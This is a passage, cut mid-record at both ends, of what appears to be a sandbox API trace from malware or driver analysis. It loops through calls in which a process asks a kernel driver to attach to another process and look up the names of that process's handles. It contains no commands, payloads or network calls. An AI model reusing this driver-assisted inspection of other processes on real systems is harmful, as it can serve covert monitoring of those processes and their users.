dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.182] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.182] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0139.182] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.182] PsAcquireProcessExitSynchronization () returned 0x0 [0139.182] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.182] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034382d0, HandleInformation=0x0) returned 0x0 [0139.182] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.182] PsReleaseProcessExitSynchronization () returned 0x2 [0139.182] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.182] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8002f81044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f81044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.182] ObfDereferenceObject (Object=0xfffffa80034382d0) returned 0x1 [0139.182] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.182] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.182] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.182] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0139.183] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.183] PsAcquireProcessExitSynchronization () returned 0x0 [0139.183] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.183] ObReferenceObjectByHandle (in: Handle=0x2fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003840930, HandleInformation=0x0) returned 0x0 [0139.183] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.183] PsReleaseProcessExitSynchronization () returned 0x2 [0139.183] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.183] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8002f82044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f82044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.183] ObfDereferenceObject (Object=0xfffffa8003840930) returned 0x1 [0139.183] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.183] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.183] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.183] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0139.183] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.183] PsAcquireProcessExitSynchronization () returned 0x0 [0139.183] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.184] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038568c0, HandleInformation=0x0) returned 0x0 [0139.184] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.184] PsReleaseProcessExitSynchronization () returned 0x2 [0139.184] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.184] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8002f83044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f83044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.184] ObfDereferenceObject (Object=0xfffffa80038568c0) returned 0x1 [0139.184] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.184] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.184] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.184] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0139.184] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.184] PsAcquireProcessExitSynchronization () returned 0x0 [0139.184] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.184] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800384cf20, HandleInformation=0x0) returned 0x0 [0139.184] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.184] PsReleaseProcessExitSynchronization () returned 0x2 [0139.184] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.184] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8002f84044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f84044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.184] ObfDereferenceObject (Object=0xfffffa800384cf20) returned 0x1 [0139.185] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.185] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.185] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.185] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0139.185] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.185] PsAcquireProcessExitSynchronization () returned 0x0 [0139.185] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.185] ObReferenceObjectByHandle (in: Handle=0x32c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c69080, HandleInformation=0x0) returned 0x0 [0139.185] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.185] PsReleaseProcessExitSynchronization () returned 0x2 [0139.185] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.185] ObQueryNameString (in: Object=0xfffff8a000c69080, ObjectNameInfo=0xfffffa8002f85044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f85044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.185] ObfDereferenceObject (Object=0xfffff8a000c69080) returned 0x3 [0139.185] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.185] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.185] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.185] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0139.186] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.186] PsAcquireProcessExitSynchronization () returned 0x0 [0139.186] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.186] ObReferenceObjectByHandle (in: Handle=0x40c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038e3960, HandleInformation=0x0) returned 0x0 [0139.186] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.186] PsReleaseProcessExitSynchronization () returned 0x2 [0139.186] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.186] ObQueryNameString (in: Object=0xfffffa80038e3960, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163550) returned 0x0 [0139.186] ObfDereferenceObject (Object=0xfffffa80038e3960) returned 0x1 [0139.186] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.186] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.186] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.186] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3c, lpOverlapped=0x0) returned 1 [0139.186] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.186] PsAcquireProcessExitSynchronization () returned 0x0 [0139.186] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.186] ObReferenceObjectByHandle (in: Handle=0x440, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a9d5f0, HandleInformation=0x0) returned 0x0 [0139.186] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.186] PsReleaseProcessExitSynchronization () returned 0x2 [0139.186] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.186] ObQueryNameString (in: Object=0xfffffa8003a9d5f0, ObjectNameInfo=0xfffffa8002f6c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f6c044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.187] ObfDereferenceObject (Object=0xfffffa8003a9d5f0) returned 0x2 [0139.187] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.187] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.187] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.187] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd0, lpOverlapped=0x0) returned 1 [0139.187] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.187] PsAcquireProcessExitSynchronization () returned 0x0 [0139.187] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.187] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8010bbbf20, HandleInformation=0x0) returned 0x0 [0139.187] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.187] PsReleaseProcessExitSynchronization () returned 0x2 [0139.187] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.187] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f20044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f20044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.187] ObfDereferenceObject (Object=0xfffffa8010bbbf20) returned 0x6 [0139.187] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.187] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.187] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.187] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0139.187] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.188] PsAcquireProcessExitSynchronization () returned 0x0 [0139.188] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.188] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003883280, HandleInformation=0x0) returned 0x0 [0139.188] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.188] PsReleaseProcessExitSynchronization () returned 0x2 [0139.188] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.188] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ed6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ed6044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.188] ObfDereferenceObject (Object=0xfffffa8003883280) returned 0x12 [0139.188] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.188] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.188] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.188] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0139.188] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.188] PsAcquireProcessExitSynchronization () returned 0x0 [0139.188] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.188] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036be3d0, HandleInformation=0x0) returned 0x0 [0139.188] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.188] PsReleaseProcessExitSynchronization () returned 0x2 [0139.188] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.188] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f26044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f26044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.188] ObfDereferenceObject (Object=0xfffffa80036be3d0) returned 0x12 [0139.188] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.189] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.189] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.189] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd4, lpOverlapped=0x0) returned 1 [0139.189] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.189] PsAcquireProcessExitSynchronization () returned 0x0 [0139.189] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.189] ObReferenceObjectByHandle (in: Handle=0x4b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034a5070, HandleInformation=0x0) returned 0x0 [0139.189] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.189] PsReleaseProcessExitSynchronization () returned 0x2 [0139.189] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.189] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f25044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f25044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.189] ObfDereferenceObject (Object=0xfffffa80034a5070) returned 0x13 [0139.189] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.189] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.189] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.189] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xca, lpOverlapped=0x0) returned 1 [0139.189] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.189] PsAcquireProcessExitSynchronization () returned 0x0 [0139.190] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.190] ObReferenceObjectByHandle (in: Handle=0x4b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036fa740, HandleInformation=0x0) returned 0x0 [0139.190] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.190] PsReleaseProcessExitSynchronization () returned 0x2 [0139.190] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.190] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f0e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0e044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.190] ObfDereferenceObject (Object=0xfffffa80036fa740) returned 0x21 [0139.190] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.190] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.190] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.190] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0139.190] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.190] PsAcquireProcessExitSynchronization () returned 0x0 [0139.190] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.190] ObReferenceObjectByHandle (in: Handle=0x4b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036fa490, HandleInformation=0x0) returned 0x0 [0139.190] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.190] PsReleaseProcessExitSynchronization () returned 0x2 [0139.190] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.190] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f22044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f22044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.190] ObfDereferenceObject (Object=0xfffffa80036fa490) returned 0x12 [0139.190] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.191] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.191] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.191] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0139.191] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.191] PsAcquireProcessExitSynchronization () returned 0x0 [0139.191] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.191] ObReferenceObjectByHandle (in: Handle=0x4c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037072c0, HandleInformation=0x0) returned 0x0 [0139.191] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.191] PsReleaseProcessExitSynchronization () returned 0x2 [0139.191] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.191] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f13044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f13044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.191] ObfDereferenceObject (Object=0xfffffa80037072c0) returned 0x12 [0139.191] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.191] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.191] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.191] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0139.191] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.191] PsAcquireProcessExitSynchronization () returned 0x0 [0139.191] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.192] ObReferenceObjectByHandle (in: Handle=0x4cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003734070, HandleInformation=0x0) returned 0x0 [0139.192] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.192] PsReleaseProcessExitSynchronization () returned 0x2 [0139.192] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.192] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f0f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0f044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.192] ObfDereferenceObject (Object=0xfffffa8003734070) returned 0x13 [0139.192] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.192] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.192] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.192] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0139.192] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.192] PsAcquireProcessExitSynchronization () returned 0x0 [0139.192] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 